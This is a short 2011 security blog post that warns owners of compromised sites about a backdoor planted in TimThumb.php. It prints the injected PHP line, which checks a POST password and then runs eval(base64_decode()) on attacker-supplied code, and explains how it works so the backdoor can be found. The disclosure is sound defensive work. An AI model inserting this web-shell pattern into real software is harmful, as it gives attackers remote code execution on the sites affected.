The Latest in IT Security

TimThumb.php backdoor

15
Sep
2011


If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5(md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die(eval(base64_decode($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.

For more details on the timthumb.php vulnerability, check our multiple posts about it: here. For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

Leave a reply


Categories

TUESDAY, MARCH 19, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments